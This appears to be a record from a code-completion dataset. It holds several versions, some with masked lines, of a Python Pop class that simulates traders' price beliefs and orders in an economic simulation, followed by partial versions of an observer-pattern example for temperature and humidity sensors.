return self.money - self.money_yesterday
@property
def total_trades(self):
"""Total number of trades this Pop participated in"""
return self.successful_trades + self.failed_trades
@property
def trade_success(self):
"""Percent of trades that were successful"""
if self.total_trades == 0:
return 0
return self.successful_trades / self.total_trades * 100
@property
def is_away(self):
"""Is this Pop away from it's home?"""
return self.home is not self.location
def go_to_province(self, province):
"""Moves the Pop to another Province"""
self.location = province
def decide_trade_plan(self):
"""
Decide what good to trade in and how much.
Look for the most in demand good, or the most expensive good at the home Province
        Find a province near home province where it's the cheapest and there's inventory
"""
self.trade_amount = 5
most_demanded_goods = self.home.market.goods_demand_ratio(day_range=1)
most_demanded_goods = sorted(most_demanded_goods.items(), key=lambda
i: i[1], reverse=True)
if self.trade_good:
self.update_ideal_inventory()
if DEBUG:
print('Finding a Good to trade:')
for good, demand in most_demanded_goods:
if demand > 0:
price_at_home = self.home.market.mean_price(good)
if DEBUG:
print('Good: {}, Demand: {}, Price: ${}'.format(good.
title, demand, price_at_home))
neighboring_markets = [p.market for p in self.location.
owned_neighbors]
neighboring_markets = [m for m in neighboring_markets if m.
supply_for(good) > self.trade_amount]
neighboring_markets.sort(key=lambda m: m.supply_for(good),
reverse=True)
if len(neighboring_markets) > 0:
target = neighboring_markets[0].location
price_at_target = target.market.mean_price(good)
if price_at_home > price_at_target:
offset = 0
if good is Good.bread:
offset = 1
self.inventory.set_ideal(good, self.trade_amount +
offset)
self.trade_location = target
if DEBUG:
print(
'\tTarget: {}, Supply: {}, Price: ${}, Price at home: ${}'
.format(self.trade_location.name, self.
trade_location.market.supply_for(good),
self.trade_location.market.mean_price(good),
price_at_home))
self.trade_good = good
return
elif DEBUG:
print(
'\tPrice is higher at target (home: ${} target: ${})'
.format(price_at_home, price_at_target))
elif DEBUG:
print('\tNo markets selling {} found'.format(good))
def update_ideal_inventory(self):
"""Update ideal inventory"""
for good in Good.all():
self.inventory.set_ideal(good, 0)
for item in self.pop_job.ideal_inventory:
self.inventory.set_ideal(item['good'], item['amount'])
def give_start_inventory(self):
"""Give the Pop the inventory it needs to do its job"""
for item in self.pop_job.start_inventory:
self.inventory.add(item['good'], item['amount'])
def change_population(self, trade_success):
"""Change the population based off the trade"""
self.population_yesterday = self.population
if trade_success:
self.population += round(self.population * 0.01)
else:
self.population -= round(self.population * 0.002)
def handle_bankruptcy(self, pop_job):
"""Change job, create money out of thin air, update ideal inventory"""
self.pop_job = pop_job
self.bankrupt_times += 1
self.money = 2
self.update_ideal_inventory()
self.give_start_inventory()
def perform_logic(self):
"""Depending on PopJob, perform logic (including production)"""
logic = self.pop_job.logic(self)
logic.perform()
def create_buy_order(self, good, limit):
"""Create a buy order for a given Good at a determined quantity"""
bid_price = self.determine_price_of(good)
ideal = self.determine_buy_quantity(good)
quantity_to_buy = limit if ideal > limit else ideal
if quantity_to_buy > 0:
return Order(self, OrderType.buy_order, quantity_to_buy,
bid_price, good)
return False
def create_sell_order(self, good, limit):
"""Create a sell order for a given Good at a determined quantity"""
sell_price = self.determine_price_of(good)
ideal = self.determine_sell_quantity(good)
quantity_to_sell = limit if ideal < limit else ideal
if quantity_to_sell > 0:
return Order(self, OrderType.sell_order, quantity_to_sell,
sell_price, good)
return False
def price_belief_for(self, good):
"""Gets the price belief this agent has for a particular Good"""
if good in self.price_belief:
return self.price_belief[good]
def determine_price_of(self, good):
"""Determine the price of a particular good"""
return self.price_belief_for(good).random()
def trading_range_extremes(self, good):
"""Gets the lowest and highst price of a Good this agent has seen"""
trading_range = self.observed_trading_range[good]
return PriceRange(min(trading_range), max(trading_range))
def determine_sell_quantity(self, good):
"""Determine how much inventory goods to sell based on market conditions"""
mean = self.market.avg_historial_price(good, 15)
trading_range = self.trading_range_extremes(good)
favoribility = position_in_range(mean, trading_range.low,
trading_range.high)
amount_to_sell = round(favoribility * self.inventory.surplus(good))
if amount_to_sell < 1:
amount_to_sell = 1
return amount_to_sell
def determine_buy_quantity(self, good):
"""Determine how much goods to buy based on market conditions"""
mean = self.market.avg_historial_price(good, 15)
trading_range = self.trading_range_extremes(good)
favoribility = 1 - position_in_range(mean, trading_range.low,
trading_range.high)
amount_to_buy = round(favoribility * self.inventory.shortage(good))
if amount_to_buy < 1:
amount_to_buy = 1
return amount_to_buy
def generate_orders(self, good):
"""
If the Pop needs a Good to perform production, buy it
If the Pop has surplus Resources, sell them
"""
surplus = self.inventory.surplus(good)
if surplus >= 1:
sell_amount = surplus
order = self.create_sell_order(good, surplus)
if order:
self.market.sell(order)
else:
shortage = self.inventory.shortage(good)
free_space = self.inventory.empty_space
if shortage > 0:
if shortage <= free_space:
limit = shortage
else:
limit = math.floor(free_space / shortage)
if limit > 0:
order = self.create_buy_order(good, limit)
if order:
self.market.buy(order)
def update_price_model(self, good, order_type, is_successful,
clearing_price=0):
"""
Update the Pop's price model for the given resource
        good (Good) The Good which was ordered
order_type (OrderType) Which kind of Order this was
is_successful (bool) whether or not the Order was successful
clearing_price (float) The price per unit of the good that was ordered
as defined by the Pop which ordered it
"""
SIGNIFICANT = 0.25
SIG_IMBALANCE = 0.33
LOW_INVENTORY = 0.1
HIGH_INVENTORY = 2.0
MIN_PRICE = 0.01
if is_successful:
self.observed_trading_range[good].append(clearing_price)
public_mean_price = self.market.mean_price(good)
belief = self.price_belief[good]
mean = belief.mean()
wobble = 0.05
delta_to_mean = mean - public_mean_price
if is_successful:
if (order_type is OrderType.buy_order and delta_to_mean >
SIGNIFICANT):
belief.low -= delta_to_mean / 2
belief.high -= delta_to_mean / 2
elif order_type is OrderType.sell_order and delta_to_mean < -SIGNIFICANT:
belief.low -= delta_to_mean / 2
belief.high -= delta_to_mean / 2
belief.low += wobble * mean
belief.high -= wobble * mean
else:
belief.low -= delta_to_mean / 2
belief.high -= delta_to_mean / 2
stocks = self.inventory.get_amount(good)
ideal = self.inventory.get_ideal(good)
if (order_type is OrderType.buy_order and stocks <
LOW_INVENTORY * ideal):
wobble *= 2
elif order_type is OrderType.sell_order and stocks > HIGH_INVENTORY * ideal:
wobble *= 2
else:
sells = self.market.history.sell_orders.average(good, 1)
buys = self.market.history.buy_orders.average(good, 1)
if sells + buys > 0:
supply_vs_demand = (sells - buys) / (sells + buys)
if (supply_vs_demand > SIG_IMBALANCE or
supply_vs_demand < -SIG_IMBALANCE):
new_mean = public_mean_price * (1 - supply_vs_demand)
delta_to_mean = mean - new_mean
belief.low -= delta_to_mean / 2
belief.high -= delta_to_mean / 2
belief.low -= wobble * mean
belief.high += wobble * mean
if belief.low < MIN_PRICE:
belief.low = MIN_PRICE
elif belief.high < MIN_PRICE:
belief.high = MIN_PRICE
def __repr__(self):
return '<Pop: id={} type={}>'.format(self.id, self.pop_job.title)
<mask token>
def __key__(self):
return self.id
def __hash__(self):
return hash(self.__key__())
def export(self):
model = {'pop_job': self.pop_job.ref(), 'population': self.
population, 'population_yesterday': self.population_yesterday,
'inventory': self.inventory.export(), 'money': self.money,
'money_yesterday': self.money_yesterday, 'successful_trades':
self.successful_trades, 'failed_trades': self.failed_trades,
'bankrupt_times': self.bankrupt_times}
if self.pop_job is PopJob.merchant:
location_id = None
if self.trade_location:
location_id = self.trade_location.id
model.update({'location': self.location.id, 'trade_location':
location_id, 'trade_good': self.trade_good, 'trade_amount':
self.trade_amount})
return model
| import math
from historia.utils import unique_id, position_in_range
from historia.pops.models.inventory import Inventory
from historia.economy.enums.resource import Good, NaturalResource
from historia.economy.enums.order_type import OrderType
from historia.economy.models.price_range import PriceRange
from historia.economy.models.order import Order
from historia.pops.enums.pop_job import PopJob
DEBUG = False
class Pop(object):
"""
A simulated unit of population
"""
def __init__(self, province, pop_job, population):
"""
Creates a new Pop.
manager (Historia)
province (SecondaryDivision)
culture (Culture)
religion (Religion)
language (Language)
job (Job)
"""
self.bankrupt_times = 0
self.home = province
self.location = province
self.id = unique_id('po')
self.population = population
self.population_yesterday = 0
self.pop_job = pop_job
self.money = pop_job.start_money
self.money_yesterday = 0
self.bankrupt = False
self.inventory = Inventory(pop_job.inventory_size)
self.give_start_inventory()
self.update_ideal_inventory()
self.price_belief = {}
self.observed_trading_range = {}
self.successful_trades = 0
self.failed_trades = 0
for good in Good.all():
avg_price = self.market.avg_historial_price(good, 15)
self.observed_trading_range[good] = [avg_price * 0.5, avg_price *
1.5]
self.price_belief[good] = PriceRange(avg_price * 0.5, avg_price *
1.5)
self.trade_location = None
self.trade_good = None
self.trade_amount = 0
self.trading_days = 0
@property
def social_class(self):
return self.pop_job.social_class
@property
def market(self):
"""Get the market instance"""
return self.location.market
@property
def profit(self):
"""Determine today's profit"""
return self.money - self.money_yesterday
@property
def total_trades(self):
"""Total number of trades this Pop participated in"""
return self.successful_trades + self.failed_trades
@property
def trade_success(self):
"""Percent of trades that were successful"""
if self.total_trades == 0:
return 0
return self.successful_trades / self.total_trades * 100
@property
def is_away(self):
"""Is this Pop away from it's home?"""
return self.home is not self.location
def go_to_province(self, province):
"""Moves the Pop to another Province"""
self.location = province
def decide_trade_plan(self):
"""
Decide what good to trade in and how much.
Look for the most in demand good, or the most expensive good at the home Province
        Find a province near home province where it's the cheapest and there's inventory
"""
self.trade_amount = 5
most_demanded_goods = self.home.market.goods_demand_ratio(day_range=1)
most_demanded_goods = sorted(most_demanded_goods.items(), key=lambda
i: i[1], reverse=True)
if self.trade_good:
self.update_ideal_inventory()
if DEBUG:
print('Finding a Good to trade:')
for good, demand in most_demanded_goods:
if demand > 0:
price_at_home = self.home.market.mean_price(good)
if DEBUG:
print('Good: {}, Demand: {}, Price: ${}'.format(good.
title, demand, price_at_home))
neighboring_markets = [p.market for p in self.location.
owned_neighbors]
neighboring_markets = [m for m in neighboring_markets if m.
supply_for(good) > self.trade_amount]
neighboring_markets.sort(key=lambda m: m.supply_for(good),
reverse=True)
if len(neighboring_markets) > 0:
target = neighboring_markets[0].location
price_at_target = target.market.mean_price(good)
if price_at_home > price_at_target:
offset = 0
if good is Good.bread:
offset = 1
self.inventory.set_ideal(good, self.trade_amount +
offset)
self.trade_location = target
if DEBUG:
print(
'\tTarget: {}, Supply: {}, Price: ${}, Price at home: ${}'
.format(self.trade_location.name, self.
trade_location.market.supply_for(good),
self.trade_location.market.mean_price(good),
price_at_home))
self.trade_good = good
return
elif DEBUG:
print(
'\tPrice is higher at target (home: ${} target: ${})'
.format(price_at_home, price_at_target))
elif DEBUG:
print('\tNo markets selling {} found'.format(good))
def update_ideal_inventory(self):
"""Update ideal inventory"""
for good in Good.all():
self.inventory.set_ideal(good, 0)
for item in self.pop_job.ideal_inventory:
self.inventory.set_ideal(item['good'], item['amount'])
def give_start_inventory(self):
"""Give the Pop the inventory it needs to do its job"""
for item in self.pop_job.start_inventory:
self.inventory.add(item['good'], item['amount'])
def change_population(self, trade_success):
"""Change the population based off the trade"""
self.population_yesterday = self.population
if trade_success:
self.population += round(self.population * 0.01)
else:
self.population -= round(self.population * 0.002)
def handle_bankruptcy(self, pop_job):
"""Change job, create money out of thin air, update ideal inventory"""
self.pop_job = pop_job
self.bankrupt_times += 1
self.money = 2
self.update_ideal_inventory()
self.give_start_inventory()
def perform_logic(self):
"""Depending on PopJob, perform logic (including production)"""
logic = self.pop_job.logic(self)
logic.perform()
def create_buy_order(self, good, limit):
"""Create a buy order for a given Good at a determined quantity"""
bid_price = self.determine_price_of(good)
ideal = self.determine_buy_quantity(good)
quantity_to_buy = limit if ideal > limit else ideal
if quantity_to_buy > 0:
return Order(self, OrderType.buy_order, quantity_to_buy,
bid_price, good)
return False
def create_sell_order(self, good, limit):
"""Create a sell order for a given Good at a determined quantity"""
sell_price = self.determine_price_of(good)
ideal = self.determine_sell_quantity(good)
quantity_to_sell = limit if ideal < limit else ideal
if quantity_to_sell > 0:
return Order(self, OrderType.sell_order, quantity_to_sell,
sell_price, good)
return False
def price_belief_for(self, good):
"""Gets the price belief this agent has for a particular Good"""
if good in self.price_belief:
return self.price_belief[good]
def determine_price_of(self, good):
"""Determine the price of a particular good"""
return self.price_belief_for(good).random()
def trading_range_extremes(self, good):
"""Gets the lowest and highst price of a Good this agent has seen"""
trading_range = self.observed_trading_range[good]
return PriceRange(min(trading_range), max(trading_range))
def determine_sell_quantity(self, good):
"""Determine how much inventory goods to sell based on market conditions"""
mean = self.market.avg_historial_price(good, 15)
trading_range = self.trading_range_extremes(good)
favoribility = position_in_range(mean, trading_range.low,
trading_range.high)
amount_to_sell = round(favoribility * self.inventory.surplus(good))
if amount_to_sell < 1:
amount_to_sell = 1
return amount_to_sell
def determine_buy_quantity(self, good):
"""Determine how much goods to buy based on market conditions"""
mean = self.market.avg_historial_price(good, 15)
trading_range = self.trading_range_extremes(good)
favoribility = 1 - position_in_range(mean, trading_range.low,
trading_range.high)
amount_to_buy = round(favoribility * self.inventory.shortage(good))
if amount_to_buy < 1:
amount_to_buy = 1
return amount_to_buy
def generate_orders(self, good):
"""
If the Pop needs a Good to perform production, buy it
If the Pop has surplus Resources, sell them
"""
surplus = self.inventory.surplus(good)
if surplus >= 1:
sell_amount = surplus
order = self.create_sell_order(good, surplus)
if order:
self.market.sell(order)
else:
shortage = self.inventory.shortage(good)
free_space = self.inventory.empty_space
if shortage > 0:
if shortage <= free_space:
limit = shortage
else:
limit = math.floor(free_space / shortage)
if limit > 0:
order = self.create_buy_order(good, limit)
if order:
self.market.buy(order)
def update_price_model(self, good, order_type, is_successful,
clearing_price=0):
"""
Update the Pop's price model for the given resource
        good (Good) The Good which was ordered
order_type (OrderType) Which kind of Order this was
is_successful (bool) whether or not the Order was successful
clearing_price (float) The price per unit of the good that was ordered
as defined by the Pop which ordered it
"""
SIGNIFICANT = 0.25
SIG_IMBALANCE = 0.33
LOW_INVENTORY = 0.1
HIGH_INVENTORY = 2.0
MIN_PRICE = 0.01
if is_successful:
self.observed_trading_range[good].append(clearing_price)
public_mean_price = self.market.mean_price(good)
belief = self.price_belief[good]
mean = belief.mean()
wobble = 0.05
delta_to_mean = mean - public_mean_price
if is_successful:
if (order_type is OrderType.buy_order and delta_to_mean >
SIGNIFICANT):
belief.low -= delta_to_mean / 2
belief.high -= delta_to_mean / 2
elif order_type is OrderType.sell_order and delta_to_mean < -SIGNIFICANT:
belief.low -= delta_to_mean / 2
belief.high -= delta_to_mean / 2
belief.low += wobble * mean
belief.high -= wobble * mean
else:
belief.low -= delta_to_mean / 2
belief.high -= delta_to_mean / 2
stocks = self.inventory.get_amount(good)
ideal = self.inventory.get_ideal(good)
if (order_type is OrderType.buy_order and stocks <
LOW_INVENTORY * ideal):
wobble *= 2
elif order_type is OrderType.sell_order and stocks > HIGH_INVENTORY * ideal:
wobble *= 2
else:
sells = self.market.history.sell_orders.average(good, 1)
buys = self.market.history.buy_orders.average(good, 1)
if sells + buys > 0:
supply_vs_demand = (sells - buys) / (sells + buys)
if (supply_vs_demand > SIG_IMBALANCE or
supply_vs_demand < -SIG_IMBALANCE):
new_mean = public_mean_price * (1 - supply_vs_demand)
delta_to_mean = mean - new_mean
belief.low -= delta_to_mean / 2
belief.high -= delta_to_mean / 2
belief.low -= wobble * mean
belief.high += wobble * mean
if belief.low < MIN_PRICE:
belief.low = MIN_PRICE
elif belief.high < MIN_PRICE:
belief.high = MIN_PRICE
def __repr__(self):
return '<Pop: id={} type={}>'.format(self.id, self.pop_job.title)
def __eq__(self, other):
return self.id == other.id
def __key__(self):
return self.id
def __hash__(self):
return hash(self.__key__())
def export(self):
model = {'pop_job': self.pop_job.ref(), 'population': self.
population, 'population_yesterday': self.population_yesterday,
'inventory': self.inventory.export(), 'money': self.money,
'money_yesterday': self.money_yesterday, 'successful_trades':
self.successful_trades, 'failed_trades': self.failed_trades,
'bankrupt_times': self.bankrupt_times}
if self.pop_job is PopJob.merchant:
location_id = None
if self.trade_location:
location_id = self.trade_location.id
model.update({'location': self.location.id, 'trade_location':
location_id, 'trade_good': self.trade_good, 'trade_amount':
self.trade_amount})
return model
| import math
from historia.utils import unique_id, position_in_range
from historia.pops.models.inventory import Inventory
from historia.economy.enums.resource import Good, NaturalResource
from historia.economy.enums.order_type import OrderType
from historia.economy.models.price_range import PriceRange
from historia.economy.models.order import Order
from historia.pops.enums.pop_job import PopJob
DEBUG = False
class Pop(object):
"""
A simulated unit of population
"""
def __init__(self, province, pop_job, population):
"""
Creates a new Pop.
manager (Historia)
province (SecondaryDivision)
culture (Culture)
religion (Religion)
language (Language)
job (Job)
"""
self.bankrupt_times = 0
self.home = province
self.location = province
self.id = unique_id('po')
self.population = population
self.population_yesterday = 0
self.pop_job = pop_job
# ECONOMY
self.money = pop_job.start_money
self.money_yesterday = 0
self.bankrupt = False
# set inventory and ideal amounts
self.inventory = Inventory(pop_job.inventory_size)
self.give_start_inventory()
self.update_ideal_inventory()
# a dictionary of Goods to PriceRanges
# represents the price range the agent considers valid for each Good
self.price_belief = {}
# a dictionary of Goods to price list
# represents the prices of the good that the Pop has observed
# during the time they have been trading
self.observed_trading_range = {}
self.successful_trades = 0
self.failed_trades = 0
# make some fake initial data
for good in Good.all():
avg_price = self.market.avg_historial_price(good, 15)
# fake trades
self.observed_trading_range[good] = [
avg_price * 0.5,
avg_price * 1.5
]
# generate fake price belief
self.price_belief[good] = PriceRange(avg_price * 0.5, avg_price * 1.5)
# Merchant logic
self.trade_location = None # the province this Pop is traveling to
self.trade_good = None # what good we're trading in right now
self.trade_amount = 0 # amount of trade_good we should be trading
self.trading_days = 0 # number of days waiting to trade
# Generic Pop properties
@property
def social_class(self):
return self.pop_job.social_class
@property
def market(self):
"Get the market instance"
return self.location.market
@property
def profit(self):
"Determine today's profit"
return self.money - self.money_yesterday
@property
def total_trades(self):
"Total number of trades this Pop participated in"
return self.successful_trades + self.failed_trades
@property
def trade_success(self):
"Percent of trades that were successful"
if self.total_trades == 0:
return 0
return (self.successful_trades / self.total_trades) * 100
@property
def is_away(self):
"Is this Pop away from it's home?"
return self.home is not self.location
# Merchant specific logic
def go_to_province(self, province):
"Moves the Pop to another Province"
self.location = province
def decide_trade_plan(self):
"""
Decide what good to trade in and how much.
Look for the most in demand good, or the most expensive good at the home Province
        Find a province near home province where it's the cheapest and there's inventory
"""
self.trade_amount = 5
most_demanded_goods = self.home.market.goods_demand_ratio(day_range=1)
most_demanded_goods = sorted(most_demanded_goods.items(), key=lambda i: i[1], reverse=True)
# if we already had a trade good, refresh ideal inventory
if self.trade_good:
self.update_ideal_inventory()
if DEBUG: print("Finding a Good to trade:")
for good, demand in most_demanded_goods:
if demand > 0:
# find nearby provinces where this has inventory and the price is lower
price_at_home = self.home.market.mean_price(good)
if DEBUG: print("Good: {}, Demand: {}, Price: ${}".format(good.title, demand, price_at_home))
neighboring_markets = [p.market for p in self.location.owned_neighbors]
neighboring_markets = [m for m in neighboring_markets if m.supply_for(good) > self.trade_amount]
neighboring_markets.sort(key=lambda m: m.supply_for(good), reverse=True)
if len(neighboring_markets) > 0:
# we found places where this good is cheaper and in inventory
target = neighboring_markets[0].location
price_at_target = target.market.mean_price(good)
# only trade with prices where we can make money
if price_at_home > price_at_target:
offset = 0
if good is Good.bread:
offset = 1
self.inventory.set_ideal(good, self.trade_amount + offset)
self.trade_location = target
if DEBUG:
print("\tTarget: {}, Supply: {}, Price: ${}, Price at home: ${}".format(
self.trade_location.name,
self.trade_location.market.supply_for(good),
self.trade_location.market.mean_price(good),
price_at_home)
)
self.trade_good = good
return
else:
if DEBUG: print("\tPrice is higher at target (home: ${} target: ${})".format(price_at_home, price_at_target))
else:
if DEBUG: print("\tNo markets selling {} found".format(good))
# Generic economic logic
def update_ideal_inventory(self):
"Update ideal inventory"
# reset so that the Pop can sell the inventory it doesn't need
for good in Good.all():
self.inventory.set_ideal(good, 0)
# update ideal inventory for new Job
for item in self.pop_job.ideal_inventory:
self.inventory.set_ideal(item['good'], item['amount'])
def give_start_inventory(self):
"Give the Pop the inventory it needs to do its job"
for item in self.pop_job.start_inventory:
self.inventory.add(item['good'], item['amount'])
def change_population(self, trade_success):
"Change the population based off the trade"
self.population_yesterday = self.population
if trade_success:
self.population += round(self.population * 0.01)
else:
self.population -= round(self.population * 0.002)
def handle_bankruptcy(self, pop_job):
"Change job, create money out of thin air, update ideal inventory"
# TODO: stop creating money out of thin air
self.pop_job = pop_job
self.bankrupt_times += 1
self.money = 2
self.update_ideal_inventory()
self.give_start_inventory()
def perform_logic(self):
"Depending on PopJob, perform logic (including production)"
logic = self.pop_job.logic(self)
logic.perform()
def create_buy_order(self, good, limit):
"Create a buy order for a given Good at a determined quantity"
bid_price = self.determine_price_of(good)
ideal = self.determine_buy_quantity(good)
# can't buy more than limit
quantity_to_buy = limit if ideal > limit else ideal
if quantity_to_buy > 0:
return Order(self, OrderType.buy_order, quantity_to_buy, bid_price, good)
return False
def create_sell_order(self, good, limit):
"Create a sell order for a given Good at a determined quantity"
sell_price = self.determine_price_of(good)
ideal = self.determine_sell_quantity(good)
# can't buy more than limit
quantity_to_sell = limit if ideal < limit else ideal
if quantity_to_sell > 0:
return Order(self, OrderType.sell_order, quantity_to_sell, sell_price, good)
return False
def price_belief_for(self, good):
"Gets the price belief this agent has for a particular Good"
if good in self.price_belief:
return self.price_belief[good]
def determine_price_of(self, good):
"Determine the price of a particular good"
return self.price_belief_for(good).random()
def trading_range_extremes(self, good):
"Gets the lowest and highst price of a Good this agent has seen"
trading_range = self.observed_trading_range[good]
return PriceRange(min(trading_range), max(trading_range))
def determine_sell_quantity(self, good):
"Determine how much inventory goods to sell based on market conditions"
mean = self.market.avg_historial_price(good, 15)
trading_range = self.trading_range_extremes(good)
favoribility = position_in_range(mean, trading_range.low, trading_range.high)
amount_to_sell = round(favoribility * self.inventory.surplus(good))
if amount_to_sell < 1:
amount_to_sell = 1
return amount_to_sell
def determine_buy_quantity(self, good):
"Determine how much goods to buy based on market conditions"
mean = self.market.avg_historial_price(good, 15)
trading_range = self.trading_range_extremes(good)
favoribility = 1 - position_in_range(mean, trading_range.low, trading_range.high)
amount_to_buy = round(favoribility * self.inventory.shortage(good))
if amount_to_buy < 1:
amount_to_buy = 1
return amount_to_buy
def generate_orders(self, good):
"""
If the Pop needs a Good to perform production, buy it
If the Pop has surplus Resources, sell them
"""
surplus = self.inventory.surplus(good)
if surplus >= 1: # sell inventory
            # the original only sold one item here
sell_amount = surplus
order = self.create_sell_order(good, surplus)
if order:
# print('{} sells {} {}'.format(self.pop_job.title, sell_amount, good.name))
self.market.sell(order)
else: # buy more
shortage = self.inventory.shortage(good)
free_space = self.inventory.empty_space
if shortage > 0:
if shortage <= free_space:
# enough space for ideal order
limit = shortage
else:
# not enough space for ideal order
limit = math.floor(free_space / shortage)
if limit > 0:
order = self.create_buy_order(good, limit)
if order:
# print('{} buys {} {}'.format(self.pop_job.title, limit, good.name))
self.market.buy(order)
# else:
# print("{} has no shortage of {} (has shortage: {})".format(self.pop_job.title, good.title, shortage))
def update_price_model(self, good, order_type, is_successful, clearing_price=0):
"""
Update the Pop's price model for the given resource
        good (Good) The Good which was ordered
order_type (OrderType) Which kind of Order this was
is_successful (bool) whether or not the Order was successful
clearing_price (float) The price per unit of the good that was ordered
as defined by the Pop which ordered it
"""
SIGNIFICANT = 0.25 # 25% more or less is "significant"
SIG_IMBALANCE = 0.33
LOW_INVENTORY = 0.1 # 10% of ideal inventory = "LOW"
HIGH_INVENTORY = 2.0 # 200% of ideal inventory = "HIGH"
MIN_PRICE = 0.01 # lowest allowed price of a Good
if is_successful:
# add this trade to the observed trading range
self.observed_trading_range[good].append(clearing_price)
public_mean_price = self.market.mean_price(good)
belief = self.price_belief[good]
mean = belief.mean()
wobble = 0.05 # the degree which the Pop should bid outside the belief
# how different the public mean price is from the price belief
delta_to_mean = mean - public_mean_price
if is_successful:
if order_type is OrderType.buy_order and delta_to_mean > SIGNIFICANT:
# this Pop overpaid, shift belief towards mean
belief.low -= delta_to_mean / 2
belief.high -= delta_to_mean / 2
elif order_type is OrderType.sell_order and delta_to_mean < -SIGNIFICANT:
# this Pop underpaid!, shift belief towards mean
belief.low -= delta_to_mean / 2
belief.high -= delta_to_mean / 2
# increase the belief's certainty
belief.low += wobble * mean
belief.high -= wobble * mean
else:
# shift towards mean
belief.low -= delta_to_mean / 2
belief.high -= delta_to_mean / 2
# check for inventory special cases
stocks = self.inventory.get_amount(good)
ideal = self.inventory.get_ideal(good)
# if we're buying and inventory is too low
# meaning we're desperate to buy
if order_type is OrderType.buy_order and stocks < LOW_INVENTORY * ideal:
wobble *= 2
# if we're selling and inventory is too high
# meaning we're desperate to sell
elif order_type is OrderType.sell_order and stocks > HIGH_INVENTORY * ideal:
wobble *= 2
# all other cases
else:
sells = self.market.history.sell_orders.average(good, 1)
buys = self.market.history.buy_orders.average(good, 1)
# TODO: figure out why this is sometimes 0
if sells + buys > 0:
supply_vs_demand = (sells - buys) / (sells + buys)
if supply_vs_demand > SIG_IMBALANCE or supply_vs_demand < -SIG_IMBALANCE:
# too much supply? lower bid lower to sell faster
# too much demand? raise price to buy faster
new_mean = public_mean_price * (1 - supply_vs_demand)
delta_to_mean = mean - new_mean
# shift the price belief to the new price mean
belief.low -= delta_to_mean / 2
belief.high -= delta_to_mean / 2
# decrease belief's certainty since we've just changed it (we could be wrong)
belief.low -= wobble * mean
belief.high += wobble * mean
# make sure the price belief doesn't decrease below the minimum
if belief.low < MIN_PRICE:
belief.low = MIN_PRICE
elif belief.high < MIN_PRICE:
belief.high = MIN_PRICE
# Python utility methods
def __repr__(self):
return "<Pop: id={} type={}>".format(self.id, self.pop_job.title)
def __eq__(self, other):
return self.id == other.id
def __key__(self):
return self.id
def __hash__(self):
return hash(self.__key__())
def export(self):
model = {
'pop_job': self.pop_job.ref(),
'population': self.population,
'population_yesterday': self.population_yesterday,
'inventory': self.inventory.export(),
'money': self.money,
'money_yesterday': self.money_yesterday,
'successful_trades': self.successful_trades,
'failed_trades': self.failed_trades,
'bankrupt_times': self.bankrupt_times,
}
if self.pop_job is PopJob.merchant:
location_id = None
if self.trade_location:
location_id = self.trade_location.id
model.update({
'location': self.location.id,
'trade_location': location_id,
'trade_good': self.trade_good,
'trade_amount': self.trade_amount
})
return model
| [
15,
26,
28,
32,
33
] |
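The buy and sell quantities in Pop hinge on where the market's historical mean price falls inside the price range this particular agent has observed: a mean near the top of the range favors selling, a mean near the bottom favors buying. A self-contained sketch of that favorability rule, with position_in_range inlined (with clamping) since historia.utils is not shown in this file; sell_fraction is a name introduced here:

def position_in_range(value, low, high):
    """Relative position of value inside [low, high], clamped to [0, 1]."""
    span = high - low
    if span <= 0:
        return 0.5
    return min(max((value - low) / span, 0.0), 1.0)

def sell_fraction(mean_price, observed_prices):
    """Fraction of its surplus a Pop would sell at the current mean price."""
    return position_in_range(mean_price, min(observed_prices), max(observed_prices))

# The higher the mean sits in the observed range, the more gets sold.
print(sell_fraction(9.0, [4.0, 6.0, 10.0]))  # ~0.83 -> sell most of the surplus
print(sell_fraction(4.5, [4.0, 6.0, 10.0]))  # ~0.08 -> hold inventory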
662 | 3b3f423cfb08413a4135646ea4d3d6dcb5d0cc10 | <mask token>
class MonitorTruck(AbstractObservable):
"""
Concrete Observable class
"""
def __init__(self, name):
super().__init__()
self.name = name
self.__physical_properties = {'temperature': 0.0, 'humidity': 0.0}
def set_value(self, measure_key, val):
if measure_key in self.__physical_properties:
self.__physical_properties[measure_key] = val
self.notify_observers()
else:
print(f'Parameter type {measure_key} not supported.')
def get_value(self, measure_key):
return self.__physical_properties.get(measure_key)
class Thermometer(AbstractObserver):
"""
Concrete Observer - Thermometer
"""
def __init__(self):
super().__init__()
def update(self, tt, obj):
if tt.__class__ == MonitorTruck:
temperature = tt.get_value('temperature')
if temperature > 37.8:
print(f'WARNING - Temperature too high: {temperature}')
elif temperature < 36.0:
                print(f'WARNING - Temperature too low: {temperature}')
else:
print(f'INFO - Temperature normal: {temperature}')
else:
pass
class HumidityMeter(AbstractObserver):
"""
Concrete Observer - humidity meter
"""
def __init__(self):
super().__init__()
def update(self, tt, obj):
if tt.__class__ == MonitorTruck:
humidity_value = tt.get_value('humidity')
if humidity_value > 60:
print(f'WARNING - humidity too high: {humidity_value}')
elif humidity_value < 40:
                print(f'WARNING - humidity too low: {humidity_value}')
else:
print(f'INFO - humidity normal: {humidity_value}')
else:
pass
<mask token>
| class AbstractObservable:
<mask token>
def __init__(self):
self.__observers = []
<mask token>
def remove_observer(self, observer):
self.__observers.remove(observer)
def notify_observers(self, arg=0):
for o in self.__observers:
o.update(self, arg)
class AbstractObserver:
"""
Abstract Observer - Abstract device
"""
def __init__(self):
pass
    def update(self, observable, arg):
pass
class MonitorTruck(AbstractObservable):
"""
Concrete Observable class
"""
def __init__(self, name):
super().__init__()
self.name = name
self.__physical_properties = {'temperature': 0.0, 'humidity': 0.0}
def set_value(self, measure_key, val):
if measure_key in self.__physical_properties:
self.__physical_properties[measure_key] = val
self.notify_observers()
else:
print(f'Parameter type {measure_key} not supported.')
def get_value(self, measure_key):
return self.__physical_properties.get(measure_key)
class Thermometer(AbstractObserver):
"""
Concrete Observer - Thermometer
"""
def __init__(self):
super().__init__()
def update(self, tt, obj):
if tt.__class__ == MonitorTruck:
temperature = tt.get_value('temperature')
if temperature > 37.8:
print(f'WARNING - Temperature too high: {temperature}')
elif temperature < 36.0:
                print(f'WARNING - Temperature too low: {temperature}')
else:
print(f'INFO - Temperature normal: {temperature}')
else:
pass
class HumidityMeter(AbstractObserver):
"""
Concrete Observer - humidity meter
"""
def __init__(self):
super().__init__()
def update(self, tt, obj):
if tt.__class__ == MonitorTruck:
humidity_value = tt.get_value('humidity')
if humidity_value > 60:
print(f'WARNING - humidity too high: {humidity_value}')
elif humidity_value < 40:
                print(f'WARNING - humidity too low: {humidity_value}')
else:
print(f'INFO - humidity normal: {humidity_value}')
else:
pass
<mask token>
| class AbstractObservable:
